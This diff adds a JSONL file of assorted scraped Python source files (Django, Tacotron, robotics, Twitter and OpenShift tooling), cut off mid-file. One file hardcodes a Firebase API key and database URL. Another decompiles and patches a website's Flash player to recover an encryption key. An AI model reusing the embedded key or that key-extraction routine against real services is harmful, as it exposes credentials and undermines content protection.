diff --git "a/2527.jsonl" "b/2527.jsonl"
new file mode 100644
--- /dev/null
+++ "b/2527.jsonl"
@@ -0,0 +1,702 @@
+{"seq_id":"129988797","text":"from django.core.management.base import BaseCommand, CommandError\nfrom core.models import UserProfile\nimport csv\nfrom datetime import datetime\n\nclass Command(BaseCommand):\n    help = 'Loads users csv'\n\n    def add_arguments(self, parser):\n        parser.add_argument('file_path', nargs=1, type=str)\n    \n    def handle(self, *args, **options):\n        file_path = options['file_path'][0]\n\n        with open(file_path) as file:\n            reader = csv.reader(file, delimiter='\\t')\n            next(reader)\n            for row in reader:\n\n                self.stdout.write(self.style.NOTICE('Row: \"%s\"' % row))\n\n                user, created = UserProfile.objects.get_or_create(\n                    id=row[0],\n                    gender=row[1] if row[1] != '' else None,\n                    age=row[2] if row[2] != '' else None,\n                    country=row[3],\n                    registered_at=datetime.strptime(row[4], '%b %d, %Y') if row[4] != '' else None \n                )\n\n                if created:\n                    self.stdout.write(self.style.SUCCESS('Created user: \"%s\"' % user.id))\n                else:\n                    self.stdout.write(self.style.WARNING('User \"%s\" already exists' % user.id))","sub_path":"recommender/core/management/commands/load_users_profile.py","file_name":"load_users_profile.py","file_ext":"py","file_size_in_byte":1218,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"}
+{"seq_id":"396305079","text":"# -*- coding: utf-8 -*-\n# Soohwan Kim @sooftware\n# This source code is licensed under the Apache 2.0 License found in the\n# LICENSE file in the root directory of this source tree\n\nimport math\nimport random\nimport torch\nimport threading\nfrom torch.utils.data import Dataset\nfrom tacotron2.data.audio.parser import MelSpectrogramParser\nfrom tacotron2.data.text import text_to_sequence\nfrom tacotron2.utils import logger\n\n\nclass TextMelDataset(Dataset, MelSpectrogramParser):\n    \"\"\"\n    Dataset for Text & Mel-Spectrogram matching\n\n    Args:\n        audio_paths (list): list of audio_path\n        transcripts (list): list of transcript\n        feature_extract_by (str): which library to use to extract mel spectrogram\n        sample_rate (int): sampling rate of audio files\n        num_mel_bins (int): number of mel bins\n        frame_length_ms (float): frame length in milliseconds\n        frame_shift_ms (float): frame shift in milliseconds\n    \"\"\"\n    def __init__(\n            self,\n            audio_paths: list,\n            transcripts: list,\n            feature_extract_by: str,\n            sample_rate: int = 22050,\n            num_mel_bins: int = 80,\n            frame_length_ms: float = 50,\n            frame_shift_ms: float = 12.5\n    ):\n        super(TextMelDataset, self).__init__(feature_extract_by, sample_rate, num_mel_bins, frame_length_ms, frame_shift_ms)\n        self.audio_paths = audio_paths\n        self.transcripts = transcripts\n\n    def parse_text(self, text):\n        return torch.IntTensor(text_to_sequence(text, 'english_cleaner'))\n\n    def get_item(self, index):\n        text = self.parse_text(self.transcripts[index])\n        mel_spectrogram = self.parse_audio(self.audio_paths[index])\n\n        return text, mel_spectrogram\n\n    def shuffle(self):\n        tmp = list(zip(self.audio_paths, self.transcripts))\n        random.shuffle(tmp)\n        self.audio_paths, self.transcripts = zip(*tmp)\n\n    def __len__(self):\n        return len(self.audio_paths)\n\n    def count(self):\n        return len(self.audio_paths)\n\n\nclass TextMelDataLoader(threading.Thread):\n    def __init__(self, dataset: TextMelDataset, queue, batch_size, thread_id, pad_id):\n        threading.Thread.__init__(self)\n        self.dataset = dataset\n        self.queue = queue\n        self.index = 0\n        self.batch_size = batch_size\n        self.dataset_count = 
dataset.count()\n        self.thread_id = thread_id\n        self.pad_id = pad_id\n\n    def create_empty_batch(self):\n        seqs = torch.zeros(0, 0, 0)\n        targets = torch.zeros(0, 0).to(torch.long)\n\n        seq_lengths = list()\n        target_lengths = list()\n\n        return seqs, targets, seq_lengths, target_lengths\n\n    def run(self):\n        \"\"\" Load data from MelSpectrogramDataset \"\"\"\n        logger.debug('loader %d start' % self.thread_id)\n\n        while True:\n            items = list()\n\n            for _ in range(self.batch_size):\n                if self.index >= self.dataset_count:\n                    break\n\n                text, mel_spectrogram = self.dataset.get_item(self.index)\n\n                if mel_spectrogram is not None:\n                    items.append((text, mel_spectrogram))\n\n                self.index += 1\n\n            if len(items) == 0:\n                batch = self.create_empty_batch()\n                self.queue.put(batch)\n                break\n\n            batch = self.collate_fn(items)\n            self.queue.put(batch)\n\n        logger.debug('loader %d stop' % self.thread_id)\n\n    def collate_fn(self, batch):\n        def seq_length_(p):\n            return len(p[0])\n\n        def target_length_(p):\n            return len(p[1])\n\n        # sort by sequence length for rnn.pack_padded_sequence()\n        batch = sorted(batch, key=lambda sample: sample[0].size(0), reverse=True)\n\n        input_lengths = [len(s[0]) for s in batch]\n        target_lengths = [len(s[1]) for s in batch]\n\n        max_seq_sample = max(batch, key=seq_length_)[0]\n        max_target_sample = max(batch, key=target_length_)[1]\n\n        max_seq_size = max_seq_sample.size(0)\n        max_target_size = len(max_target_sample)\n\n        feat_size = max_seq_sample.size(1)\n        batch_size = len(batch)\n\n        inputs = torch.zeros(batch_size, max_seq_size, feat_size)\n\n        targets = torch.zeros(batch_size, max_target_size).to(torch.long)\n        targets.fill_(self.pad_id)\n\n        for x in range(batch_size):\n            sample = batch[x]\n            tensor = sample[0]\n            target = sample[1]\n            seq_length = tensor.size(0)\n\n            inputs[x].narrow(0, 0, seq_length).copy_(tensor)\n            targets[x].narrow(0, 0, len(target)).copy_(torch.LongTensor(target))\n\n        input_lengths = torch.IntTensor(input_lengths)\n\n        return inputs, targets, input_lengths, target_lengths\n\n    def count(self):\n        return math.ceil(self.dataset_count / self.batch_size)\n\n\nclass MultiDataLoader(object):\n    \"\"\"\n    Multi Data Loader using Threads.\n\n    Args:\n        dataset_list (list): list of MelSpectrogramDataset\n        queue (Queue.queue): queue for threading\n        batch_size (int): size of batch\n        num_workers (int): the number of cpu cores used\n        pad_id (int): identifier of the pad token\n    \"\"\"\n    def __init__(self, dataset_list, queue, batch_size, num_workers, pad_id):\n        self.dataset_list = dataset_list\n        self.queue = queue\n        self.batch_size = batch_size\n        self.num_workers = num_workers\n        self.pad_id = pad_id\n        self.loader = list()\n\n        for idx in range(self.num_workers):\n            # pass pad_id through so TextMelDataLoader receives all five arguments\n            self.loader.append(TextMelDataLoader(self.dataset_list[idx], self.queue, self.batch_size, idx, self.pad_id))\n\n    def start(self):\n        \"\"\" Run threads \"\"\"\n        for idx in range(self.num_workers):\n            self.loader[idx].start()\n\n    def join(self):\n        \"\"\" Wait for the other threads \"\"\"\n        for idx in range(self.num_workers):\n            self.loader[idx].join()\n","sub_path":"tacotron2/data/data_loader.py","file_name":"data_loader.py","file_ext":"py","file_size_in_byte":5845,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"}
+{"seq_id":"161475486","text":"#!/usr/bin/python3\n\nfrom uio import Uio\nimport ctypes\n\n########## bitBlanket #####################################\n#\n# \n# Adapted from zmatt's l3-sn-test.py\n#\n# The point of this class was to keep \"driver developers\" from having to pass\n# a c structure to the uio class. 
In case a different solution is found, as\n# long as uio passes back a bitBlanket, which contains general functions for\n# accessing registers in python, the mechanics of interacting with lib uio can continue to\n# evolve without affecting libraries built on top of it.\n# Bit blanket works so that you can create a bitBlanket object, say ADC,\n# and then read AND write BYTES (the internal cstructure uses c_ubyte) in\n# the forms ADC[(0,4)] where it's (offset, length) and length can be omitted to\n# use the default value... or use ADC[SOMEREGISTERNAME], where the string is\n# mapped to an offset by a dictionary object passed when the object is\n# initialized. I made a script that will parse the table of contents in the\n# DATASHEET and generate code for a dictionary object. This doesn't support\n# bit-by-bit access, but it may in the future with a similar dictionary\n# concept. The idea was to make the interface familiar to people who\n# programmed with atmel-studio (avr) or likewise, advanced Arduino.\n# \n#\n\n\nclass bitBlanket():\n    def __init__(self, uioLabel, size, defaultWordLength = 4):\n        self.defaultWordLength = defaultWordLength\n        self.myUio = Uio(uioLabel)\n        self.memBlanket = type(\"memBlanket\", (ctypes.Structure,),\n                {\n                    \"_fields_\": [(\"number\", ctypes.c_ubyte*int(size))],\n                    \"__getitem__\": bitBlanket.getitem,\n                    \"__setitem__\":bitBlanket.setitem\n                }\n            )\n        self.memBlanket = self.myUio.map(self.memBlanket)\n\n    byteSize = (ctypes.c_ubyte, ctypes.c_ushort, ctypes.c_uint,\n            ctypes.c_ulong)\n    def __getitem__(self, i):\n        #rehandle slices\n        if isinstance(i, int):\n            i = (i, self.defaultWordLength)\n        return self.memBlanket[i].value\n\n    def __setitem__(self, i, value):\n        #rehandle slices\n        #if isinstance(i, int):\n        #    i = (i, self.defaultWordLength)\n        self.memBlanket[i] = value\n\n    def getitem(self, i):\n        if not isinstance(i, tuple) or (i.__len__() != 2):\n            raise TypeError('subindices must be 2-element tuples: %r' % i)\n        try:\n            # map a byte length of 1, 2, 4 or 8 to the matching ctypes type;\n            # tuple.index() raises ValueError for any other length\n            pointerType = bitBlanket.byteSize[(1, 2, 4, 8).index(i[1])]\n        except ValueError:\n            print('second index must be 1, 2, 4, or 8 (bytes)')\n            raise\n        return ctypes.cast(ctypes.byref(getattr(self, \"number\"), i[0]),\n                ctypes.POINTER(pointerType)).contents\n\n\n    def setitem(self, i, value):\n        if not isinstance(i, tuple) or (i.__len__() != 2):\n            raise TypeError('subindices must be 2-element tuples: %r' % i)\n        try:\n            pointerType = bitBlanket.byteSize[(1, 2, 4, 8).index(i[1])]\n        except ValueError:\n            print('second index must be 1, 2, 4, or 8 (bytes)')\n            raise\n        ctypes.cast(ctypes.byref(getattr(self, \"number\"), i[0]),\n                ctypes.POINTER(pointerType))[0] = pointerType(value)\n","sub_path":"bitblanket.py","file_name":"bitblanket.py","file_ext":"py","file_size_in_byte":3283,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"}
+{"seq_id":"179712033","text":"import gym\nimport numpy as np\n\n\n\"\"\"Data generation for the case of a single block pick and place in Fetch Env\"\"\"\n\nactions = []\nobservations = []\ninfos = []\nvectorize_observation = False\n\ndef main():\n    env = gym.make('FetchDrawTriangle-v1')\n    numItr = 100\n    initStateSpace = \"random\"\n    env.reset()\n    print(\"Reset!\")\n    while len(actions) < numItr:\n        obs = env.reset()\n        print(\"ITERATION NUMBER \", len(actions))\n        goToGoal(env, obs)\n\n\n    fileName = \"data_fetch_draw\"\n    fileName += \"_\" + initStateSpace\n    fileName += \"_\" + str(numItr)\n    fileName += \".npz\"\n\n    np.savez_compressed(fileName, acs=actions, obs=observations, info=infos) # save the file\n    return fileName\n\ndef 
vectorize_obs(obs):\n    vect_obs = []\n    for k,v in obs.items():\n        for element in v:\n            vect_obs.append(element)\n    return vect_obs\n    \ndef goToGoal(env, lastObs):\n\n    achieved_goals = np.array(lastObs['achieved_goal'])\n    achieved_goals = achieved_goals.reshape((9,3))\n    desired_goals = np.array(lastObs['desired_goal'])\n    desired_goals = desired_goals.reshape((9,3))\n    \n    episodeAcs = []\n    episodeObs = []\n    episodeInfo = []\n    dginx = 0\n\n    timeStep = 0 # count the total number of timesteps\n    if vectorize_observation:\n        episodeObs.append(vectorize_obs(lastObs))\n    else:\n        episodeObs.append(lastObs)\n    cur_grip_pos = lastObs['observation'][0:3]\n    while timeStep <= env._max_episode_steps:\n        \n        timeStep += 1\n        # env.render()\n        \n        #print(cur_grip_pos)\n        a = (desired_goals[dginx,:] - cur_grip_pos) \n        print(a)\n        action = [a[0], a[1], a[2], 0.15]\n        obsDataNew, reward, done, info = env.step(action)\n        \n        cur_grip_pos = obsDataNew['observation'][0:3]\n\n        achieved_goals = np.array(obsDataNew['achieved_goal'])\n        achieved_goals = achieved_goals.reshape((9,3))\n        desired_goals = np.array(obsDataNew['desired_goal'])\n        desired_goals = desired_goals.reshape((9,3))\n        \n        #print(achieved_goals)\n        print(desired_goals[dginx,:])\n        ag = achieved_goals[dginx,:]\n        dg = desired_goals[dginx,:]\n\n        dist = np.linalg.norm(np.array(ag) - np.array(dg), axis=-1)\n        \n        if (dist < 0.05) and dginx < 8 :\n            dginx +=1\n\n        if timeStep < env._max_episode_steps:\n            if vectorize_observation:\n                episodeObs.append(vectorize_obs(obsDataNew))\n            else:\n                episodeObs.append(obsDataNew)\n\n\n\n        episodeAcs.append(action)\n        episodeInfo.append(info)\n\n        if timeStep >= env._max_episode_steps: break\n\n    actions.append(episodeAcs)\n    observations.append(episodeObs)\n    infos.append(episodeInfo)\n\ndef test(filename):\n    print('Test')\n    data = np.load(filename)\n    print('Obs shape={}'.format(data['obs'].shape))\n    print('Acs shape={}'.format(data['acs'].shape))\n    print('Infos shape={}'.format(data['info'].shape))\n\nif __name__ == \"__main__\":\n    fileName = main()\n    test(fileName)\n","sub_path":"baselines/her/experiment/data_generation/fetch_draw_data_gen.py","file_name":"fetch_draw_data_gen.py","file_ext":"py","file_size_in_byte":3041,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"}
+{"seq_id":"172882910","text":"from sense_hat import SenseHat\nimport time\nimport datetime\nfrom time import sleep\n\nimport pyrebase\nimport sys\n\n\nconfig = {\n\t\"apiKey\": \"AIzaSyCYu7gE_4HGDIy7pOOiw0AY-rrUmoE7eXQ\",\n \t\"authDomain\": \"sensehat-51bd7.firebaseapp.com\",\n \t\"databaseURL\": \"https://sensehat-51bd7.firebaseio.com\",\n \t\"storageBucket\": \"sensehat-51bd7.appspot.com\"\n}\n\nfirebase = pyrebase.initialize_app(config)\ndb = firebase.database()\n\n\nsense = SenseHat()\n\nwhile True:\n\ttime_sense = time.strftime('%H:%M:%S')\n\tdate_sense = time.strftime('%d/%m/%Y')\n\thumidity = round((sense.get_humidity()*64)/100,1)\n\ttemperature = round(sense.get_temperature(),1)\n\tpressure = round(sense.get_pressure(),1)\n\t\n\t\n\tprint(\"Humidity %s \" %humidity)\n\tprint(\"Temperature %s Degrees Celsius\" %temperature)\n\tprint(\"Pressure: %s Millibars\" %pressure)\n\tprint()\n\n\tdata = {\"Date\": date_sense,\"Time\": time_sense, \"Temperature\": temperature, \"Humidity\": humidity, \"Pressure\": pressure}\n\tdb.child(\"/message\").push(data)\t\n\n\tsense.show_message(\"Hello 
world\")\n\t\n\ttime.sleep(5)\n\t\n","sub_path":"Sensor/sensor_firebase.py","file_name":"sensor_firebase.py","file_ext":"py","file_size_in_byte":1019,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"100989963","text":"from .dialog import *\n\n\nclass InputDialogInputField(DialogInputField):\n\n _field_borders = ()\n _img_offset = (0, 0)\n\n @classmethod\n def __set_field_borders(cls):\n\n l, r, b, t = TextureAtlas[\"outer_borders\"][\"dialog_inset1\"]\n cls._field_borders = (l, r, b, t)\n cls._img_offset = (-l, -t)\n\n def __init__(self, parent, width, on_key_enter=None, on_key_escape=None):\n\n if not self._field_borders:\n self.__set_field_borders()\n\n DialogInputField.__init__(self, parent, INSET1_BORDER_GFX_DATA, width,\n on_key_enter=on_key_enter, on_key_escape=on_key_escape)\n\n self.set_image_offset(self._img_offset)\n\n def get_outer_borders(self):\n\n return self._field_borders\n\n\nclass InputDialog(Dialog):\n\n def __init__(self, title=\"\", message=\"\", default_input=\"\", choices=\"okcancel\",\n ok_alias=\"OK\", on_yes=None, on_no=None, on_cancel=None):\n\n def command():\n\n if on_yes:\n on_yes(self._input)\n\n Dialog.__init__(self, title, choices, ok_alias, command, on_no, on_cancel)\n\n self._input = \"\"\n client_sizer = self.get_client_sizer()\n borders = (50, 50, 30, 30)\n text = DialogMessageText(self, message)\n client_sizer.add(text, borders=borders, alignment=\"center_h\")\n on_key_enter = lambda: self.close(answer=\"yes\")\n field = InputDialogInputField(self, 100, on_key_enter=on_key_enter, on_key_escape=self.close)\n field.add_value(\"input\", \"string\")\n field.set_input_parser(\"input\", self.__parse_input)\n field.show_value(\"input\")\n borders = (50, 50, 30, 0)\n client_sizer.add(field, borders=borders, expand=True)\n\n self.finalize()\n\n field.set_text(\"input\", default_input)\n field.on_left_down()\n\n def __parse_input(self, input_str):\n\n self._input = input_str.strip()\n\n return self._input\n","sub_path":"src/gui/dialog/input_dialog.py","file_name":"input_dialog.py","file_ext":"py","file_size_in_byte":1947,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"592099498","text":"# import tweepy library\n\nimport tweepy\nfrom tweepy import Stream\nfrom tweepy.streaming import StreamListener\nimport json\n\n\n#credential variables\n\naccess_token = \"\"\naccess_token_secret = \"\"\nconsumer_key = \"\"\nconsumer_key_secret = \"\"\n\nauth = tweepy.OAuthHandler(consumer_key, consumer_key_secret)\nauth.set_access_token(access_token,access_token_secret)\n\napi = tweepy.API(auth)\n\n\n#print(api.trends_place(23424975))\n\ntrendingTweets = api.trends_place(23424975)\n\n# TwitterListener CLass\n\n##Collecting tweets for: The Lion King\nclass TweetListener(StreamListener):\n\n def on_data(self, raw_data):\n try:\n with open('rio2016.json', 'a') as f:\n f.write(raw_data)\n return True\n except BaseException as e:\n print(\"Error on_data: %s\" % str(e))\n return True\n\n def on_error(self, status_code):\n print(status_code)\n return True\n\n#end of TwitterListener Class\n\ntwitterStream = Stream(auth, TweetListener())\ntwitterStream.filter(track=['#Rio2016'])\n##End of Streamer\n","sub_path":"streamer.py","file_name":"streamer.py","file_ext":"py","file_size_in_byte":1046,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"432623070","text":"import errno\nimport os\nimport os.path\nimport re\nimport 
shutil\nimport subprocess\nimport threading\ntry:\n from urllib.request import urlopen as compat_urllib_request_urlopen\nexcept ImportError:\n from urllib2 import urlopen as compat_urllib_request_urlopen\n\ntry:\n from urllib.request import urlretrieve as compat_urllib_request_urlretrieve\nexcept ImportError:\n from urllib import urlretrieve as compat_urllib_request_urlretrieve\n\nfrom config import PAGE_URL\nfrom server import run_server\nfrom selenium_runner import SeleniumRunner\nfrom common import full_path\n\n\ndef get_swf():\n print('Downloading the page %s' % PAGE_URL)\n urlh = compat_urllib_request_urlopen(PAGE_URL)\n webpage = urlh.read().decode('utf-8')\n urlh.close()\n mobj = re.search(r'http://[^\\'\"]+MainPlayer[^.]+\\.swf', webpage)\n swf_url = mobj.group(0)\n swf_path = full_path(os.path.basename(swf_url))\n\n print('SWF URL is %s' % swf_url)\n\n compat_urllib_request_urlretrieve(swf_url, filename=swf_path)\n return swf_path, swf_url\n\n\ndef run(args):\n print(' '.join(args))\n subprocess.check_call(args)\n\n\ndef patch_swf(swf_path):\n swf_name = os.path.splitext(os.path.basename(swf_path))[0]\n abc_index = 0\n abc_id = '%s-%d' % (swf_name, abc_index)\n\n try:\n os.remove(full_path('%s.abc' % abc_id))\n shutil.rmtree(full_path(abc_id))\n except OSError as e:\n if e.errno != errno.ENOENT:\n raise\n\n run(['abcexport', full_path('%s.swf' % swf_name)])\n run(['rabcdasm', full_path('%s.abc' % abc_id)])\n subprocess.Popen([\n 'patch', '-p0', '-i', '../asasm.patch'], cwd=full_path(abc_id)).wait()\n run(['rabcasm', full_path('%s/%s.main.asasm' % (abc_id, abc_id))])\n run([\n 'abcreplace', full_path('%s.swf' % swf_name), str(abc_index),\n full_path('%s/%s.main.abc' % (abc_id, abc_id))])\n\nif __name__ == '__main__':\n lock = threading.Lock()\n swf_path, swf_url = get_swf()\n patch_swf(swf_path)\n SeleniumRunner(lock).start()\n collected_data = run_server(swf_url, lock)\n enc_key = os.path.commonprefix(collected_data)\n print('enc_key = %s' % enc_key)\n","sub_path":"src/get_swf.py","file_name":"get_swf.py","file_ext":"py","file_size_in_byte":2131,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"339386682","text":"# -*- coding: utf-8 -*-\n# pragma pylint: disable=unused-argument, no-self-use\n# (c) Copyright Ryan Gordon. 2021. 
All Rights Reserved.\nfrom .i_subparser import ISubParser\nfrom resilient_sdk.app import get_main_app_sub_parser\nfrom resilient_sdk.util.sdk_argparse import SDKArgHelpFormatter\nfrom cp4s_sdk.cmds.appx.appx_publish import AppXPublishCmd\n\n\nclass AppExchangeSubParser(ISubParser):\n    \"\"\"AppExchangeSubParser is an ArgumentParser\n    which delegates work to the cp4s_connector_sdk\n    python module.\n    When a user targets the 'appx' product on the cp4s-sdk\n    this AppExchangeSubParser handles it and invokes the appropriate sdk command.\n\n    :param ISubParser: A generic type that represents the contract a subparser must uphold\n    :type ISubParser: Interface\n    \"\"\"\n\n    product = \"appx\"\n    registered = False\n\n    def register_subparser(self, *args, **kwargs):\n        if not kwargs.get(\"parent_parser\", False):\n            raise ValueError(\n                \"No Parent Parser was found in kwargs, this is needed to ensure we can attach the {} commands\".format(\n                    self.product))\n\n        parent = kwargs.get(\"parent_parser\")\n        # Top level product name\n        self.parser = parent.add_parser(self.product, help=\"(Preview) Commands for working with the App Exchange\",\n                                        formatter_class=SDKArgHelpFormatter,\n                                        conflict_handler='resolve')\n\n        # Get sub_parser object which will attach the available commands for the product SDK\n        soar_sub_parser = get_main_app_sub_parser(self.parser)\n        self.registered = True\n        # By instantiating each command and passing the subparser we register each subcommand of the appx product\n        self.cmd_publish = AppXPublishCmd(soar_sub_parser)\n        return soar_sub_parser\n\n    def is_registered(self, *args, **kwargs):\n        return self.registered\n\n    def handle_command_invocation(self, product_args):\n        # Evaluate the cmd and link to a piece of functionality\n        # Handle what subcommand was called\n        if product_args.cmd == self.cmd_publish.CMD_NAME:\n            self.cmd_publish.execute_command(product_args)\n        else:\n            self.parser.print_help()\n","sub_path":"cp4s_sdk/subparsers/appx_subparser.py","file_name":"appx_subparser.py","file_ext":"py","file_size_in_byte":2253,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"}
+{"seq_id":"644421160","text":"import config as cf\r\nimport numpy as np\r\nimport math\r\nimport random\r\nfrom random import *\r\nimport networkx as nx\r\nfrom network import Node\r\nfrom network import Energy\r\n\r\ndef init_network():\r\n    print('INITIALIZING NETWORK...')\r\n    network = nx.DiGraph()\r\n    position = np.random.uniform(low=0, high=cf.AREA_H, size=(cf.N_NODE+1,2))\r\n    network.add_node(0,pos=(cf.SINK_X,cf.SINK_Y), res_energy=5000,round=0, Next=False, N_Packet = 0, Dist=[], Cover = []) ##BS\r\n    Alive_Node = []\r\n    \r\n    R_MAX = 0\r\n    for i in range(1,cf.N_NODE+1):\r\n        # uniform(cf.E_INIT*0.5,cf.E_INIT)\r\n        R_tmp = math.sqrt((position[i][0]-cf.SINK_X)**2 + (position[i][1]-cf.SINK_Y)**2)\r\n        network.add_node(i, pos=position[i], res_energy=uniform(0.5,cf.E_INIT), round=1, Next=0, N_Packet = cf.L, Dist=[], Cover = [], RTBS = R_tmp)\r\n        network.add_edge(i,0)\r\n        Alive_Node.append(i)\r\n        if R_tmp > R_MAX:\r\n            R_MAX = R_tmp\r\n    \r\n\r\n    R = R_MAX/math.sqrt(cf.NB_Cluster)\r\n    for i in range(1,cf.N_NODE+1):\r\n        x,y = position[i]\r\n        for j in range(1,cf.N_NODE+1):\r\n            if j == i:\r\n                continue\r\n            x2,y2 = position[j]\r\n            dist = math.sqrt((x-x2)**2 + (y-y2)**2)\r\n            if dist < R:\r\n                network.node[i]['Cover'].append(j)\r\n                network.node[i]['Dist'].append(dist) \r\n\r\n    return network, Alive_Node, R\r\n\r\ndef Run_Round(network,Alive_Node,CHID,Optimizer):\r\n    Death_Node=[]\r\n    Res_Energy = []\r\n\r\n    
## Receive from BS(CH info)\r\n    for i in CHID:\r\n        IS_DEATH=0\r\n        network, IS_DEATH = Node.Receive(network, i,cf.L)\r\n        if IS_DEATH == 1:\r\n            Death_Node.append(i)\r\n\r\n    ## TX & RX\r\n    Rx_Node = []\r\n    for i in Alive_Node:\r\n        Rx_Node = network.node[i]['Next']\r\n        if Rx_Node == 0:\r\n            MSG = cf.L\r\n            network.node[Rx_Node]['N_Packet'] += MSG\r\n            if Optimizer == 'SSMOECHS':\r\n                network.node[Rx_Node]['N_Packet'] += MSG\r\n        else:\r\n            MSG = cf.NCH_L\r\n        IS_DEATH = 0\r\n        network, IS_DEATH = Node.Transmit(network,i,Rx_Node,MSG)\r\n        \r\n\r\n        ## Data Tx and Rx\r\n        if IS_DEATH == 1: ##Transmit Fail\r\n            Death_Node.append(i)\r\n        else: \r\n            network, IS_DEATH = Node.Receive(network,Rx_Node,MSG)\r\n            if IS_DEATH == 1: ##Receive Fail\r\n                Death_Node.append(Rx_Node)\r\n    Alive_Node = list(set(Alive_Node) - set(Death_Node))\r\n\r\n    for i in Alive_Node:\r\n        Res_Energy.append([i,network.node[i]['res_energy']])\r\n\r\n\r\n    return network, Alive_Node, Res_Energy\r\n\r\n\r\n# def add_edge(network,Start_NODE,Goal_NODE):\r\n#     # if network.node[Start_NODE]['Head'] == 'CH':\r\n#     #     N = len(network.in_edges(Start_NODE))+1\r\n#     #     cost = Energy.ETX(network,Start_NODE,Goal_NODE) + cf.E_DA + N*cf.E_RX\r\n#     # else:\r\n#     cost = Energy.ETX(network,Start_NODE,Goal_NODE)\r\n#     network.add_edge(Start_NODE,Goal_NODE)\r\n#     network.node[Start_NODE]['Cost']= cost\r\n#     return network","sub_path":"SSMOECHS/network/Network.py","file_name":"Network.py","file_ext":"py","file_size_in_byte":3036,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"}
+{"seq_id":"341326665","text":"from django.contrib import admin\nfrom django.urls import path\n\nfrom . import views\n\napp_name='polls'\n\nurlpatterns = [\n    path('admin/', admin.site.urls),\n    path('pracownicy/', views.detail_pracownicy),\n    path('stanowiska/', views.detail_stanowiska),\n    path('szkolenia/', views.detail_szkolenia),\n    path('urlopy/', views.detail_urlopy),\n    path('zatrudnienia/', views.detail_zatrudnienie),\n    path('premia/', views.detail_premia),\n    path('projekty/', views.detail_projekty),\n    path('rekrutacja/', views.detail_rekrutacja),\n    path('usun_pracownika/<int:id>/', views.usun_f),\n    path('usun_stanowisko/<int:id>/', views.usun_st),\n    path('usun_projekt/<int:id>/', views.usun_proj),\n    path('usun_zatrudnienie/<int:id>/', views.usun_zat),\n    path('formularz/', views.form_f),\n    path('formularz_premia/', views.form_prem),\n    path('formularz_projekty/', views.form_proj),\n    path('formularz_rekrutacja/', views.form_rekr),\n    path('formularz_stanowiska/', views.form_stan),\n    path('formularz_szkolenia/', views.form_szkol),\n    path('formularz_urlopy/', views.form_urlop),\n    path('formularz_zatrudnienia/', views.form_zatr),\n    path('edycja_stanowiska/<int:id>/', views.edycja_s),\n    path('edycja_projekt/<int:id>/', views.edycja_proj),\n    path('edycja_zatrudnienie/<int:id>/', views.edycja_zatr),\n    path('edycja_rekruta/<int:id>/', views.edycja_rekr),\n]","sub_path":"polls/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1383,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"}
+{"seq_id":"550015134","text":"# -*- coding: utf-8 -*-\n\nfrom odoo import api, fields, models\n\n\nclass StockPicking(models.Model):\n    _inherit = \"stock.picking\"\n\n    digital_id = fields.Integer(compute='_get_digital_id', string='Digital Id', readonly=True)\n\n    @api.depends('name')\n    def _get_digital_id(self):\n        try:\n            self.digital_id = self.name.split('POI/LIV/')[1]\n        except IndexError:\n            self.digital_id = 
self.name.split('POI/REC/')[1]\n","sub_path":"13.0/professional_templates_3jd/models/stock_picking.py","file_name":"stock_picking.py","file_ext":"py","file_size_in_byte":444,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"}
+{"seq_id":"628596568","text":"import itertools\nimport logging\n\nfrom sretoolbox.utils import threaded\n\nfrom reconcile import (\n    openshift_groups,\n    openshift_rolebindings,\n    queries,\n)\nfrom reconcile.utils.defer import defer\nfrom reconcile.utils.oc import OC_Map\n\nQONTRACT_INTEGRATION = \"openshift-users\"\n\n\ndef get_cluster_users(cluster, oc_map, clusters):\n    oc = oc_map.get(cluster)\n    if not oc:\n        logging.log(level=oc.log_level, msg=oc.message)\n        return []\n    users: list[str] = []\n\n    # get cluster info for current cluster name from clusters list\n    cluster_info = next((cl for cl in clusters if cl[\"name\"] == cluster))\n\n    # backwards compatibility for clusters w/o auth\n    identity_prefixes = [\"github\"]\n\n    for auth in cluster_info[\"auth\"]:\n        if auth[\"service\"] == \"oidc\":\n            identity_prefixes.append(auth[\"name\"])\n\n    for u in oc.get_users():\n        if u[\"metadata\"].get(\"labels\", {}).get(\"admin\", \"\"):\n            # ignore admins\n            continue\n        if any(\n            identity.startswith(identity_prefix)\n            for identity in u.get(\"identities\", [])\n            for identity_prefix in identity_prefixes\n        ):\n            # the user has at least one identity which is managed by app-interface\n            users.append(u[\"metadata\"][\"name\"])\n\n    return [{\"cluster\": cluster, \"user\": user} for user in users]\n\n\ndef fetch_current_state(thread_pool_size, internal, use_jump_host):\n    clusters = queries.get_clusters(minimal=True)\n    settings = queries.get_app_interface_settings()\n    oc_map = OC_Map(\n        clusters=clusters,\n        integration=QONTRACT_INTEGRATION,\n        settings=settings,\n        internal=internal,\n        use_jump_host=use_jump_host,\n        thread_pool_size=thread_pool_size,\n    )\n    results = threaded.run(\n        get_cluster_users,\n        oc_map.clusters(include_errors=True),\n        thread_pool_size,\n        oc_map=oc_map,\n        clusters=clusters,\n    )\n    current_state = list(itertools.chain.from_iterable(results))\n    return oc_map, current_state\n\n\ndef fetch_desired_state(oc_map):\n    desired_state = []\n    flat_rolebindings_desired_state = openshift_rolebindings.fetch_desired_state(\n        ri=None, oc_map=oc_map\n    )\n    desired_state.extend(flat_rolebindings_desired_state)\n\n    groups_desired_state = openshift_groups.fetch_desired_state(oc_map)\n    flat_groups_desired_state = [\n        {\"cluster\": s[\"cluster\"], \"user\": s[\"user\"]} for s in groups_desired_state\n    ]\n    desired_state.extend(flat_groups_desired_state)\n\n    return desired_state\n\n\ndef calculate_diff(current_state, 